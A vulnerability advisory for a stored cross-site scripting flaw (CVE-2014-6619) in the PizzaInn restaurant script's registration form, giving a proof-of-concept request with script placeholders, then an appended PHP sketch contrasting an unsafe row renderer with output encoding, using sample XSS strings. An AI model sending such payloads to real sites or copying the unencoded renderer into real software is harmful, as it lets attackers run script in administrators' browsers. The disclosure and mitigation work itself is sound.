Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting

EDB-ID: 34760
Platform: PHP
Date: 2014-09-24

Title:     Pizza Inn Registration Stored XSS
Severity:   High
CVE-ID:   CVE-2014-6619
Release Date:  20 September 2014 
Author:   Kenneth F. Belva
Websites:  http://silverbackventuresllc.com
    http://xssWarrior.com 
    http://securitymaverick.com
Twitter:   @infosecmaverick
Contact:  Please use website contact form.
Mail: 
URL:     http://sourceforge.net/projects/restaurantmis/
Vendor: 
Remote Exploit:  Yes

Discovered with: xssWarrior - http://xssWarrior.com


Description:
============

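Script code submitted in the registration form (the fname, lname and login parameters in the proof of concept below) is stored in the database. It executes in the administrator's browser when the administrator views the new sign-ups.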


Proof of Concept :
==================

http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register
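
Mitigation sketch for the stored XSS described above, as an added example that is not from the advisory or from the PizzaInn code base: the function names, the rendering code and the sample rows are hypothetical, and only the field names (fname, lname, login) come from the proof of concept. It contrasts raw output of stored values with output encoding at render time, and adds an assumed input rule for name fields.

```php
<?php
declare(strict_types=1);

// Constructed sample rows standing in for what register-exec.php stored.
// Field names follow the PoC parameters (fname, lname, login).
$members = [
    ['fname' => 'Alice', 'lname' => 'Ng', 'login' => 'alice'],
    ['fname' => '<script>alert(1)</script>', 'lname' => '"><b>x</b>', 'login' => "o'brien"],
];

// Encode for an HTML text or quoted-attribute context.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (hypothetical): stored values go into markup as-is.
function render_row_unsafe(array $m): string
{
    return "<tr><td>{$m['fname']}</td><td>{$m['lname']}</td><td>{$m['login']}</td></tr>";
}

// Hardened pattern: every stored value is encoded at output time.
function render_row_safe(array $m): string
{
    return '<tr><td>' . h($m['fname']) . '</td><td>' . h($m['lname'])
         . '</td><td>' . h($m['login']) . '</td></tr>';
}

// Input-side check for the registration handler (assumed rule):
// accept only letters, spaces, apostrophe, dot and hyphen, 1 to 64 chars.
function valid_name(string $value): bool
{
    return preg_match("/^[\\p{L} '.\\-]{1,64}$/u", $value) === 1;
}

foreach ($members as $m) {
    echo "unsafe: ", render_row_unsafe($m), PHP_EOL;
    echo "safe:   ", render_row_safe($m), PHP_EOL;
    echo "fname passes validation: ", valid_name($m['fname']) ? 'yes' : 'no', PHP_EOL;
}
```

Encoding at output is the control that closes the issue; the input rule only narrows what reaches the database and does not cover rows already stored.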